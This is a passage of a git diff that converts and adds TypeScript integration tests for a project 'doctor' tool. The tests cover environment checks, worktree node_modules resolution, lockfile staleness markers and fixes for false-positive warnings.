+    assert.ok(Array.isArray(result.fixesApplied), "dry-run report has fixesApplied array");
 
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 11. Per-check timing ─────────────────────────────────────────────────────
-  console.log("\n=== per-check timing ===");
-  {
+  test('per-check timing', async () => {
     const { base, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: Timing Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
 
     const result = await runGSDDoctor(base, { fix: false });
-    assertTrue(result.timing !== undefined, "report includes timing");
-    assertTrue(typeof result.timing?.git === "number", "timing.git is a number");
-    assertTrue(typeof result.timing?.runtime === "number", "timing.runtime is a number");
-    assertTrue(typeof result.timing?.environment === "number", "timing.environment is a number");
-    assertTrue(typeof result.timing?.gsdState === "number", "timing.gsdState is a number");
+    assert.ok(result.timing !== undefined, "report includes timing");
+    assert.ok(typeof result.timing?.git === "number", "timing.git is a number");
+    assert.ok(typeof result.timing?.runtime === "number", "timing.runtime is a number");
+    assert.ok(typeof result.timing?.environment === "number", "timing.environment is a number");
+    assert.ok(typeof result.timing?.gsdState === "number", "timing.gsdState is a number");
 
     rmSync(base, { recursive: true, force: true });
-  }
+  });
 
   // ── 12. Doctor history ───────────────────────────────────────────────────────
-  console.log("\n=== doctor history ===");
-  {
+  test('doctor history', async () => {
     const { base, gsd, mDir } = makeBase();
     writeRoadmap(mDir, `# M001: History Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
     writeSlice(mDir, "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
@@ -244,23 +228,16 @@ async function main(): Promise<void> {
     await runGSDDoctor(base, { fix: false });
 
     const historyPath = join(gsd, "doctor-history.jsonl");
-    assertTrue(existsSync(historyPath), "doctor-history.jsonl is created after run");
+    assert.ok(existsSync(historyPath), "doctor-history.jsonl is created after run");
 
-    const { readDoctorHistory } = await import("../doctor.js");
+    const { readDoctorHistory } = await import("../../doctor.js");
     const history = await readDoctorHistory(base);
-    assertTrue(history.length >= 1, "history has at least one entry");
-    assertTrue(typeof history[0]?.ts === "string", "history entry has ts field");
-    assertTrue(typeof history[0]?.ok === "boolean", "history entry has ok field");
-    assertTrue(typeof history[0]?.errors === "number", "history entry has errors count");
-    assertTrue(Array.isArray(history[0]?.codes), "history entry has codes array");
+    assert.ok(history.length >= 1, "history has at least one entry");
+    assert.ok(typeof history[0]?.ts === "string", "history entry has ts field");
+    assert.ok(typeof history[0]?.ok === "boolean", "history entry has ok field");
+    assert.ok(typeof history[0]?.errors === "number", "history entry has errors count");
+    assert.ok(Array.isArray(history[0]?.codes), "history entry has codes array");
 
     rmSync(base, { recursive: true, force: true });
-  }
-
-  report();
-}
-
-main().catch(err => {
-  console.error(err);
-  process.exit(1);
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/integration/doctor-environment-worktree.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-environment-worktree.test.ts
new file mode 100644
index 000000000..fe3ea7614
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/doctor-environment-worktree.test.ts
@@ -0,0 +1,164 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+/**
+ * doctor-environment-worktree.test.ts — Worktree-aware dependency checks (#2303).
+ *
+ * Reproduction: doctor-environment `checkDependenciesInstalled` falsely reports
+ * `env_dependencies` error inside auto-worktrees because `node_modules` is
+ * absent by design (worktrees symlink to the project root's node_modules and
+ * the symlink may not yet exist at check time).
+ *
+ * Fix: when the basePath contains `.gsd/worktrees/`, resolve the project root
+ * and check its node_modules instead.
+ */
+
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, symlinkSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  runEnvironmentChecks,
+  environmentResultsToDoctorIssues,
+  checkEnvironmentHealth,
+} from "../../doctor-environment.ts";
+/** Create a directory tree with files. */
+function createDir(files: Record<string, string> = {}): string {
+  const dir = mkdtempSync(join(tmpdir(), "gsd-wt-env-"));
+  for (const [name, content] of Object.entries(files)) {
+    const filePath = join(dir, name);
+    mkdirSync(dirname(filePath), { recursive: true });
+    writeFileSync(filePath, content);
+  }
+  return dir;
+}
+
+describe('doctor-environment-worktree', async () => {
+  const cleanups: string[] = [];
+
+  try {
+    // ── Reproduction: worktree path without node_modules ───────────────
+    test('worktree: missing node_modules should NOT error when project root has them', () => {
+      // Simulate project root with node_modules
+      const projectRoot = createDir({
+        "package.json": JSON.stringify({ name: "test-project" }),
+      });
+      mkdirSync(join(projectRoot, "node_modules"), { recursive: true });
+      cleanups.push(projectRoot);
+
+      // Simulate a worktree inside .gsd/worktrees/<name>/
+      const worktreeDir = join(projectRoot, ".gsd", "worktrees", "slice-abc");
+      mkdirSync(worktreeDir, { recursive: true });
+      writeFileSync(
+        join(worktreeDir, "package.json"),
+        JSON.stringify({ name: "test-project" }),
+      );
+      // node_modules intentionally absent — this is the bug scenario
+
+      const results = runEnvironmentChecks(worktreeDir);
+      const depsCheck = results.find(r => r.name === "dependencies");
+
+      // Before fix: this would return status "error" with "node_modules missing"
+      // After fix: should return "ok" because project root has node_modules
+      assert.ok(
+        depsCheck === undefined || depsCheck.status !== "error",
+        "worktree should not report env_dependencies error when project root has node_modules",
+      );
+    });
+
+    // ── Worktree with NO node_modules anywhere should still error ──────
+    test('worktree: missing node_modules everywhere should still error', () => {
+      const projectRoot = createDir({
+        "package.json": JSON.stringify({ name: "test-project" }),
+      });
+      cleanups.push(projectRoot);
+      // No node_modules at project root either
+
+      const worktreeDir = join(projectRoot, ".gsd", "worktrees", "slice-xyz");
+      mkdirSync(worktreeDir, { recursive: true });
+      writeFileSync(
+        join(worktreeDir, "package.json"),
+        JSON.stringify({ name: "test-project" }),
+      );
+
+      const results = runEnvironmentChecks(worktreeDir);
+      const depsCheck = results.find(r => r.name === "dependencies");
+      assert.ok(depsCheck !== undefined, "dependencies check still runs in worktree");
+      assert.deepStrictEqual(depsCheck!.status, "error", "reports error when node_modules missing everywhere");
+    });
+
+    // ── Worktree env_dependencies not in doctor issues ──────────────────
+    test('worktree: checkEnvironmentHealth should not add env_dependencies for valid worktree', async () => {
+      const projectRoot = createDir({
+        "package.json": JSON.stringify({ name: "test-project" }),
+      });
+      mkdirSync(join(projectRoot, "node_modules"), { recursive: true });
+      cleanups.push(projectRoot);
+
+      const worktreeDir = join(projectRoot, ".gsd", "worktrees", "slice-pr");
+      mkdirSync(worktreeDir, { recursive: true });
+      writeFileSync(
+        join(worktreeDir, "package.json"),
+        JSON.stringify({ name: "test-project" }),
+      );
+
+      const issues: any[] = [];
+      await checkEnvironmentHealth(worktreeDir, issues);
+      const depIssue = issues.find(i => i.code === "env_dependencies");
+      assert.deepStrictEqual(
+        depIssue,
+        undefined,
+        "no env_dependencies issue for worktree with project root node_modules",
+      );
+    });
+
+    // ── Non-worktree path still catches missing node_modules ───────────
+    test('non-worktree: missing node_modules still detected', () => {
+      const dir = createDir({
+        "package.json": JSON.stringify({ name: "test" }),
+      });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const depsCheck = results.find(r => r.name === "dependencies");
+      assert.ok(depsCheck !== undefined, "dependencies check runs");
+      assert.deepStrictEqual(depsCheck!.status, "error", "missing node_modules is an error for non-worktree");
+    });
+
+    // ── GSD_WORKTREE env var detection ─────────────────────────────────
+    test('GSD_WORKTREE env: should resolve project root node_modules', () => {
+      const projectRoot = createDir({
+        "package.json": JSON.stringify({ name: "test-project" }),
+      });
+      mkdirSync(join(projectRoot, "node_modules"), { recursive: true });
+      cleanups.push(projectRoot);
+
+      // Create a directory that doesn't have .gsd/worktrees in path but
+      // has GSD_WORKTREE env pointing to project root
+      const someDir = createDir({
+        "package.json": JSON.stringify({ name: "test-project" }),
+      });
+      cleanups.push(someDir);
+
+      const origEnv = process.env.GSD_WORKTREE;
+      try {
+        process.env.GSD_WORKTREE = projectRoot;
+        const results = runEnvironmentChecks(someDir);
+        const depsCheck = results.find(r => r.name === "dependencies");
+        assert.ok(
+          depsCheck === undefined || depsCheck.status !== "error",
+          "GSD_WORKTREE env allows fallback to project root node_modules",
+        );
+      } finally {
+        if (origEnv === undefined) {
+          delete process.env.GSD_WORKTREE;
+        } else {
+          process.env.GSD_WORKTREE = origEnv;
+        }
+      }
+    });
+
+  } finally {
+    for (const dir of cleanups) {
+      try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
+    }
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/integration/doctor-environment.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-environment.test.ts
new file mode 100644
index 000000000..99fa35363
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/doctor-environment.test.ts
@@ -0,0 +1,403 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+/**
+ * doctor-environment.test.ts — Tests for environment health checks (#1221).
+ *
+ * Tests:
+ *   - Node version detection
+ *   - Dependencies installed check
+ *   - Env file detection
+ *   - Port conflict detection
+ *   - Disk space check
+ *   - Docker detection
+ *   - Project tool detection
+ *   - Doctor issue conversion
+ *   - Report formatting
+ */
+
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, utimesSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  runEnvironmentChecks,
+  runFullEnvironmentChecks,
+  environmentResultsToDoctorIssues,
+  formatEnvironmentReport,
+  checkEnvironmentHealth,
+  type EnvironmentCheckResult,
+} from "../../doctor-environment.ts";
+function createProjectDir(files: Record<string, string> = {}): string {
+  const dir = mkdtempSync(join(tmpdir(), "gsd-env-test-"));
+  for (const [name, content] of Object.entries(files)) {
+    const filePath = join(dir, name);
+    mkdirSync(dirname(filePath), { recursive: true });
+    writeFileSync(filePath, content);
+  }
+  return dir;
+}
+
+describe('doctor-environment', async () => {
+  const cleanups: string[] = [];
+
+  try {
+    // ── Node Version Check ─────────────────────────────────────────────
+    test('env: no package.json returns empty', () => {
+      const dir = createProjectDir();
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      // No package.json → no node checks
+      const nodeCheck = results.find(r => r.name === "node_version");
+      assert.deepStrictEqual(nodeCheck, undefined, "no node version check without package.json");
+    });
+
+    test('env: package.json without engines returns no node check', () => {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test", version: "1.0.0" }),
+      });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const nodeCheck = results.find(r => r.name === "node_version");
+      assert.deepStrictEqual(nodeCheck, undefined, "no node version check without engines field");
+    });
+
+    test('env: package.json with engines returns node check', () => {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({
+          name: "test",
+          version: "1.0.0",
+          engines: { node: ">=18.0.0" },
+        }),
+      });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const nodeCheck = results.find(r => r.name === "node_version");
+      assert.ok(nodeCheck !== undefined, "node version check runs with engines field");
+      // Current node should be >= 18 in CI
+      assert.deepStrictEqual(nodeCheck!.status, "ok", "node version meets requirement");
+    });
+
+    // ── Dependencies Check ─────────────────────────────────────────────
+    test('env: missing node_modules detected', () => {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+      });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const depsCheck = results.find(r => r.name === "dependencies");
+      assert.ok(depsCheck !== undefined, "dependencies check runs");
+      assert.deepStrictEqual(depsCheck!.status, "error", "missing node_modules is an error");
+      assert.ok(depsCheck!.message.includes("node_modules missing"), "reports missing node_modules");
+    });
+
+    test('env: existing node_modules detected', () => {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const depsCheck = results.find(r => r.name === "dependencies");
+      assert.ok(depsCheck !== undefined, "dependencies check runs");
+      assert.deepStrictEqual(depsCheck!.status, "ok", "existing node_modules is ok");
+    });
+
+    // ── Stale Dependencies: marker file check (#1974) ──────────────────
+    console.log("\n=== env: npm marker file newer than lockfile → ok (#1974) ===");
+    {
+      // Simulate the exact bug scenario:
+      // 1. node_modules dir mtime is old (no entries added/removed recently)
+      // 2. package-lock.json mtime is recent (npm rewrote it)
+      // 3. node_modules/.package-lock.json mtime is between dir and lockfile
+      //    (npm wrote it during the same install that rewrote the lockfile)
+      //
+      // The bug: code compares lockfile mtime vs dir mtime → false positive warning
+      // The fix: compare lockfile mtime vs marker file mtime → correctly ok
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+
+      // Simulate the exact bug: npm install with "up to date" rewrites the
+      // lockfile and the marker, but no packages are added/removed so the
+      // directory mtime should be old. We write the marker first (which
+      // bumps dir mtime), then force the dir mtime back to the past.
+      //
+      // Timeline: dir(T-120s) < lockfile(T-5s) ≈ marker(T-5s)
+      // Bug: code compares lockfile vs dir → false positive stale warning
+      // Fix: code compares lockfile vs marker → correctly reports ok
+      const dirTime = new Date(Date.now() - 120_000);
+      const installTime = new Date(Date.now() - 5_000);
+
+      // Write marker file (this bumps dir mtime as a side effect)
+      writeFileSync(join(dir, "node_modules", ".package-lock.json"), "{}");
+      utimesSync(join(dir, "node_modules", ".package-lock.json"), installTime, installTime);
+
+      // Force dir mtime back to the past — simulates no top-level entries changed
+      utimesSync(join(dir, "node_modules"), dirTime, dirTime);
+
+      // Lockfile written at install time (same as marker, or slightly after)
+      writeFileSync(join(dir, "package-lock.json"), "{}");
+      utimesSync(join(dir, "package-lock.json"), installTime, installTime);
+
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const depsCheck = results.find(r => r.name === "dependencies");
+      assert.ok(depsCheck !== undefined, "dependencies check runs");
+      assert.equal(depsCheck!.status, "ok", "npm marker newer than lockfile → not stale");
+    }
+
+    console.log("\n=== env: yarn marker file newer than lockfile → ok (#1974) ===");
+    {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+
+      const dirTime = new Date(Date.now() - 120_000);
+      const installTime = new Date(Date.now() - 5_000);
+
+      writeFileSync(join(dir, "node_modules", ".yarn-integrity"), "{}");
+      utimesSync(join(dir, "node_modules", ".yarn-integrity"), installTime, installTime);
+      utimesSync(join(dir, "node_modules"), dirTime, dirTime);
+
+      writeFileSync(join(dir, "yarn.lock"), "");
+      utimesSync(join(dir, "yarn.lock"), installTime, installTime);
+
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const depsCheck = results.find(r => r.name === "dependencies");
+      assert.ok(depsCheck !== undefined, "dependencies check runs");
+      assert.equal(depsCheck!.status, "ok", "yarn marker newer than lockfile → not stale");
+    }
+
+    console.log("\n=== env: pnpm marker file newer than lockfile → ok (#1974) ===");
+    {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+
+      const dirTime = new Date(Date.now() - 120_000);
+      const installTime = new Date(Date.now() - 5_000);
+
+      writeFileSync(join(dir, "node_modules", ".modules.yaml"), "{}");
+      utimesSync(join(dir, "node_modules", ".modules.yaml"), installTime, installTime);
+      utimesSync(join(dir, "node_modules"), dirTime, dirTime);
+
+      writeFileSync(join(dir, "pnpm-lock.yaml"), "");
+      utimesSync(join(dir, "pnpm-lock.yaml"), installTime, installTime);
+
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const depsCheck = results.find(r => r.name === "dependencies");
+      assert.ok(depsCheck !== undefined, "dependencies check runs");
+      assert.equal(depsCheck!.status, "ok", "pnpm marker newer than lockfile → not stale");
+    }
+
+    console.log("\n=== env: no marker file falls back to dir mtime → stale warning (#1974) ===");
+    {
+      // No marker file exists, lockfile newer than dir → should still warn
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+
+      const past = new Date(Date.now() - 60_000);
+      utimesSync(join(dir, "node_modules"), past, past);
+
+      writeFileSync(join(dir, "package-lock.json"), "{}");
+      // No marker file written — fallback to dir mtime comparison
+
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const depsCheck = results.find(r => r.name === "dependencies");
+      assert.ok(depsCheck !== undefined, "dependencies check runs");
+      assert.equal(depsCheck!.status, "warning", "no marker + lockfile newer → stale warning");
+    }
+
+    // ── Env File Check ─────────────────────────────────────────────────
+    test('env: .env.example without .env detected', () => {
+      const dir = createProjectDir({
+        ".env.example": "DB_URL=xxx\nAPI_KEY=xxx\n",
+      });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const envCheck = results.find(r => r.name === "env_file");
+      assert.ok(envCheck !== undefined, "env file check runs");
+      assert.deepStrictEqual(envCheck!.status, "warning", "missing .env is a warning");
+    });
+
+    test('env: .env.example with .env is ok', () => {
+      const dir = createProjectDir({
+        ".env.example": "DB_URL=xxx\n",
+        ".env": "DB_URL=postgres://localhost/test\n",
+      });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const envCheck = results.find(r => r.name === "env_file");
+      assert.ok(envCheck !== undefined, "env file check runs");
+      assert.deepStrictEqual(envCheck!.status, "ok", "present .env is ok");
+    });
+
+    test('env: .env.example with .env.local is ok', () => {
+      const dir = createProjectDir({
+        ".env.example": "DB_URL=xxx\n",
+        ".env.local": "DB_URL=postgres://localhost/test\n",
+      });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const envCheck = results.find(r => r.name === "env_file");
+      assert.ok(envCheck !== undefined, "env file check runs");
+      assert.deepStrictEqual(envCheck!.status, "ok", ".env.local counts as present");
+    });
+
+    // ── Disk Space Check ───────────────────────────────────────────────
+    if (process.platform !== "win32") {
+      const dir = createProjectDir();
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const diskCheck = results.find(r => r.name === "disk_space");
+      assert.ok(diskCheck !== undefined, "disk space check runs on unix");
+      // Should be ok on dev machines with reasonable disk
+      assert.ok(diskCheck!.status === "ok" || diskCheck!.status === "warning", "disk check returns valid status");
+    }
+
+    // ── Project Tools Check ────────────────────────────────────────────
+    test('env: detects missing python when pyproject.toml exists', () => {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+        "pyproject.toml": "[build-system]\nrequires = ['setuptools']\n",
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const pythonCheck = results.find(r => r.name === "python");
+      // Python is likely installed on CI/dev machines, so just verify the check runs
+      // without error — the result depends on the system
+      assert.ok(true, "python check runs without error");
+    });
+
+    test('env: detects Cargo.toml', () => {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+        "Cargo.toml": "[package]\nname = 'test'\n",
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      // Just verify it runs without error
+      assert.ok(true, "cargo check runs without error");
+    });
+
+    // ── Docker Check ───────────────────────────────────────────────────
+    test('env: no docker check without Dockerfile', () => {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const dockerCheck = results.find(r => r.name === "docker");
+      assert.deepStrictEqual(dockerCheck, undefined, "no docker check without Dockerfile");
+    });
+
+    test('env: docker check with Dockerfile', () => {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+        "Dockerfile": "FROM node:22\n",
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      const dockerCheck = results.find(r => r.name === "docker");
+      // Docker may or may not be installed on the test machine
+      assert.ok(dockerCheck !== undefined, "docker check runs when Dockerfile present");
+    });
+
+    // ── Doctor Issue Conversion ────────────────────────────────────────
+    test('env: converts results to doctor issues', () => {
+      const results: EnvironmentCheckResult[] = [
+        { name: "node_version", status: "ok", message: "Node.js v22.0.0" },
+        { name: "dependencies", status: "error", message: "node_modules missing" },
+        { name: "env_file", status: "warning", message: ".env missing", detail: "Copy .env.example" },
+      ];
+
+      const issues = environmentResultsToDoctorIssues(results);
+      assert.deepStrictEqual(issues.length, 2, "only non-ok results converted");
+      assert.deepStrictEqual(issues[0]!.severity, "error", "error severity preserved");
+      assert.deepStrictEqual(issues[0]!.code, "env_dependencies", "code prefixed with env_");
+      assert.deepStrictEqual(issues[1]!.severity, "warning", "warning severity preserved");
+      assert.ok(issues[1]!.message.includes("Copy .env.example"), "detail included in message");
+    });
+
+    // ── checkEnvironmentHealth integration ──────────────────────────────
+    test('env: checkEnvironmentHealth adds issues to array', async () => {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({ name: "test" }),
+      });
+      cleanups.push(dir);
+
+      const issues: any[] = [];
+      await checkEnvironmentHealth(dir, issues);
+      // Should have at least the missing node_modules issue
+      assert.ok(issues.some(i => i.code === "env_dependencies"), "environment issues added to array");
+    });
+
+    // ── Report Formatting ──────────────────────────────────────────────
+    test('env: formatEnvironmentReport', () => {
+      const results: EnvironmentCheckResult[] = [
+        { name: "node_version", status: "ok", message: "Node.js v22.0.0" },
+        { name: "dependencies", status: "error", message: "node_modules missing", detail: "Run npm install" },
+        { name: "disk_space", status: "ok", message: "50.2GB free" },
+      ];
+
+      const report = formatEnvironmentReport(results);
+      assert.ok(report.includes("Environment Health:"), "has header");
+      assert.ok(report.includes("Node.js v22.0.0"), "includes ok result");
+      assert.ok(report.includes("node_modules missing"), "includes error result");
+      assert.ok(report.includes("Run npm install"), "includes detail for errors");
+    });
+
+    test('env: formatEnvironmentReport empty', () => {
+      const report = formatEnvironmentReport([]);
+      assert.deepStrictEqual(report, "No environment checks applicable.", "empty report message");
+    });
+
+    // ── Full environment checks include git remote ─────────────────────
+    test('env: runFullEnvironmentChecks includes git remote', () => {
+      // runFullEnvironmentChecks adds git remote check
+      // We can't easily test this without a real git repo, but verify it doesn't throw
+      const dir = createProjectDir();
+      cleanups.push(dir);
+      const results = runFullEnvironmentChecks(dir);
+      // No git repo → no remote check, but should not throw
+      assert.ok(true, "runFullEnvironmentChecks does not throw on non-git dir");
+    });
+
+    // ── Port Detection from package.json ───────────────────────────────
+    if (process.platform !== "win32") {
+      const dir = createProjectDir({
+        "package.json": JSON.stringify({
+          name: "test",
+          scripts: {
+            dev: "next dev --port 3456",
+            start: "node server.js",
+          },
+        }),
+      });
+      mkdirSync(join(dir, "node_modules"), { recursive: true });
+      cleanups.push(dir);
+      const results = runEnvironmentChecks(dir);
+      // Port 3456 is unlikely to be in use, so no conflicts expected
+      const portConflicts = results.filter(r => r.name === "port_conflict");
+      // Just verify it ran without error
+      assert.ok(true, "port check with script-detected ports runs without error");
+    }
+
+  } finally {
+    for (const dir of cleanups) {
+      try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
+    }
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/integration/doctor-false-positives.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-false-positives.test.ts
new file mode 100644
index 000000000..c2189e236
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/doctor-false-positives.test.ts
@@ -0,0 +1,243 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync, readdirSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { runGSDDoctor } from "../../doctor.js";
+import { parsePlan } from "../../parsers-legacy.js";
+
+// ── Helpers ─────────────────────────────────────────────────────────────────
+
+function makeBase(): { base: string; gsd: string; mDir: string } {
+  const base = mkdtempSync(join(tmpdir(), "gsd-doctor-fp-"));
+  const gsd = join(base, ".gsd");
+  const mDir = join(gsd, "milestones", "M001");
+  mkdirSync(join(mDir, "slices"), { recursive: true });
+  return { base, gsd, mDir };
+}
+
+function writeRoadmap(mDir: string, content: string): void {
+  writeFileSync(join(mDir, "M001-ROADMAP.md"), content);
+}
+
+function writeSlice(mDir: string, sliceId: string, planContent: string): string {
+  const sDir = join(mDir, "slices", sliceId);
+  const tDir = join(sDir, "tasks");
+  mkdirSync(tDir, { recursive: true });
+  writeFileSync(join(sDir, `${sliceId}-PLAN.md`), planContent);
+  return sDir;
+}
+
+describe('doctor false-positives (#3105)', async () => {
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // Bug 1: Orphaned worktree directory recreated by appendDoctorHistory
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test('Bug 1: orphaned worktree check ignores dirs containing only .gsd/doctor-history.jsonl', async () => {
+    // Simulate: a worktree dir that only contains .gsd/doctor-history.jsonl
+    // (created by appendDoctorHistory writing to the worktree-scoped path).
+    // The orphan check should NOT warn about this directory.
+    const { base, gsd } = makeBase();
+    writeRoadmap(join(gsd, "milestones", "M001"), `# M001: Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
+    writeSlice(join(gsd, "milestones", "M001"), "S01", "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [ ] **T01: Task** `est:10m`\n  Pending.\n");
+
+    // Create a worktree directory that only has .gsd/doctor-history.jsonl
+    const wtDir = join(gsd, "worktrees", "M042");
+    const wtGsdDir = join(wtDir, ".gsd");
+    mkdirSync(wtGsdDir, { recursive: true });
+    writeFileSync(join(wtGsdDir, "doctor-history.jsonl"), '{"ts":"2026-01-01","ok":true}\n');
+
+    const result = await runGSDDoctor(base, { fix: false });
+
+    // Should NOT produce worktree_directory_orphaned for a dir that only has doctor history
+    const orphanIssues = result.issues.filter(
+      i => i.code === "worktree_directory_orphaned" && i.unitId === "M042"
+    );
+    assert.equal(orphanIssues.length, 0,
+      "should not warn about worktree dir that only contains .gsd/doctor-history.jsonl");
+
+    rmSync(base, { recursive: true, force: true });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // Bug 2: blocker_discovered + all tasks done = unfixable deadlock
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test('Bug 2: blocker_discovered with all tasks done should not warn (implicitly resolved)', async () => {
+    // Scenario: blocker was discovered and resolved within the same task.
+    // blocker_discovered: true, no REPLAN, but all tasks are done.
+    // Neither blocker_discovered_no_replan nor stale_replan_file should fire.
+    const { base, mDir } = makeBase();
+    writeRoadmap(mDir, `# M001: Blocker Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
+    const sDir = writeSlice(mDir, "S01",
+      "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [x] **T01: Task** `est:10m`\n  Done.\n");
+    writeFileSync(join(sDir, "tasks", "T01-SUMMARY.md"), `---
+id: T01
+parent: S01
+milestone: M001
+provides: []
+requires: []
+affects: []
+key_files: []
+key_decisions: []
+patterns_established: []
+observability_surfaces: []
+drill_down_paths: []
+duration: 10m
+verification_result: passed
+completed_at: 2026-01-01T00:00:00Z
+blocker_discovered: true
+---
+
+# T01: Task
+
+**Done**
+
+## What Happened
+Found a blocker, resolved it in-task.
+
+## Diagnostics
+- log
+`);
+
+    const result = await runGSDDoctor(base, { fix: false });
+
+    // Should NOT produce blocker_discovered_no_replan when all tasks are done
+    const blockerIssues = result.issues.filter(i => i.code === "blocker_discovered_no_replan");
+    assert.equal(blockerIssues.length, 0,
+      "should not warn about blocker_discovered when all tasks are done (blocker was implicitly resolved)");
+
+    // Also should NOT produce stale_replan_file (no REPLAN exists, so this shouldn't fire anyway)
+    const staleReplanIssues = result.issues.filter(i => i.code === "stale_replan_file");
+    assert.equal(staleReplanIssues.length, 0,
+      "should not produce stale_replan_file when no REPLAN exists");
+
+    rmSync(base, { recursive: true, force: true });
+  });
+
+  test('Bug 2: blocker_discovered with incomplete tasks should still warn', async () => {
+    // Sanity check: when there IS an incomplete task and blocker_discovered, warn as before.
+    const { base, mDir } = makeBase();
+    writeRoadmap(mDir, `# M001: Blocker Warn Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
+    const sDir = writeSlice(mDir, "S01",
+      "# S01: Slice\n\n**Goal:** G\n**Demo:** D\n\n## Tasks\n- [x] **T01: Task A** `est:10m`\n  Done.\n- [ ] **T02: Task B** `est:10m`\n  Pending.\n");
+    writeFileSync(join(sDir, "tasks", "T01-SUMMARY.md"), `---
+id: T01
+parent: S01
+milestone: M001
+provides: []
+requires: []
+affects: []
+key_files: []
+key_decisions: []
+patterns_established: []
+observability_surfaces: []
+drill_down_paths: []
+duration: 10m
+verification_result: passed
+completed_at: 2026-01-01T00:00:00Z
+blocker_discovered: true
+---
+
+# T01: Task A
+
+**Done**
+
+## What Happened
+Found blocker, but T02 is still pending.
+
+## Diagnostics
+- log
+`);
+
+    const result = await runGSDDoctor(base, { fix: false });
+
+    const blockerIssues = result.issues.filter(i => i.code === "blocker_discovered_no_replan");
+    assert.ok(blockerIssues.length > 0,
+      "should still warn about blocker_discovered when some tasks are not done");
+
+    rmSync(base, { recursive: true, force: true });
+  });
+
